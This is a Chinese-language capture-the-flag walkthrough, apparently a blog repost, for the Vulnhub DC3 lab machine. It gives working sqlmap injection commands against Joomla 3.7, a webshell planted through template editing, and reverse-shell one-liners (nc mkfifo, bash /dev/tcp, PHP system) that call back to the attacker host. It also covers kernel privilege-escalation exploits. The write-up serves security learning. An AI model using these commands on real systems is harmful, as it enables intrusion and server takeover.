标签：tmp -- fields 61.163 list 192.168 Vulnhub 靶机 DC3

基本信息

Kali:192.168.61.145 

DC3:192.168.61.163

实验过程

       同样先通过arpscan扫描找出DC3的IP地址

 

sudo arp‐scan ‐‐interface eth0 192.168.61.1/24

 

 

这里可以直接看出DC3的IP地址为192.168.61.163

然后我们使用nmap对目标进行扫描

发现目标主机只是打开了80端口

 

然后我们查看下80端口，通过wappalyzer，发现用的是Joomla

同时主页也给我们提示，表明这个靶机只有一个flag

这里我们使用joomscan专用扫描器，来获取网页更详细的信息

joomscan：https://github.com/OWASP/joomscan

perl joomscan.pl ‐u http://192.168.61.163

可以看到joomla的详细版本号和管理后台

 

我们通过searchsploit查看是否有可以用的EXP

searchsploit joomla 3.7

可以看到有一个SQL注入漏洞

searchsploit ‐x php/webapps/42033.txt

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

接下来就是导出admin的账号密码，就只放个最后的结果图，攻击过程的语句如下:

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomaladb --tables

sqlmap -u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columns

sqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

我们将password的HASH值用john进行破解

解密后的结果为：snoopy

我们尝试进行登陆，发现是正确的账号密码

 

账号：admin密码：snoopy

进入后台后，就要想办法上传一句话木马。百度到可以编辑模板来上传一个webshell

这里编辑Beez3模板

这里我在html目录下创建了一个名为dfz.php的webshell

然后我们访问下这个webshell，没有出现404说明成功上传

 

http://192.168.61.163/templates/beez3/html/dfz.php

 

接下来用蚁剑来链接

我们在Kali上使用nc，通过蚁剑反弹一个shell

我们现在Kali上建立监听

发现DC3上有python环境，尝试使用python来弹shell，但是Kali上没有任何反应

然后尝试使用bash来弹shell，但是也是不行

尝试使用nc反弹成功

 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222 >/tmp/f

然后使用python改善shell环境

python ‐c "import pty;pty.spawn('/bin/bash')"

 

获取下Linux版本，可以看到是Ubuntu 16.04

我们查找下有没有可以利用的提权EXP，通过searchsploit有好几个

这里我们使用下面的EXP尝试提权

​​​​​​​

Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) PrivilegeEscalation                                               | linux/local/39772.txt

我们打开这个EXP的介绍，并到指定网站下载

 

https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐sploits/39772.zip

通过蚁剑上传到靶机

然后接下来的话就是解压、编译、执行EXP来获得root权限，所有命令如下

unzip 39772.zipcd 39772tar ‐xvf exploit.tar

 

•  

./compile.sh

•  

./doubleput

获得flag

 

额外补充

---

利用php反弹shell

 

system("bash ‐c 'bash ‐i >& /dev/tcp/192.168.61.145/2222 0>&1'");

•  

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222>/tmp/f');

 

 

---

 

使用Linux-Exploit-suggestion来辅助提权

下载地址：https://github.com/mzet-/linux-exploit-suggester

上传到/tmp中，并加权执行

 

chmod +x linux‐exploit‐suggester.sh

 

 

这里尝试下CVE-2016-5195

EXP地址：https://github.com/gbonacini/CVE-2016-5195

下载完成后通过蚁剑上传，并解压

然后进入目录后make下就可以得到dcow文件，执行./dcow -s 尝试提权

然后靶机就死机了，说明这个EXP不适合

标签：tmp,--,fields,61.163,list,192.168,Vulnhub,靶机,DC3
来源： https://blog.csdn.net/zhangge3663/article/details/116422835

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。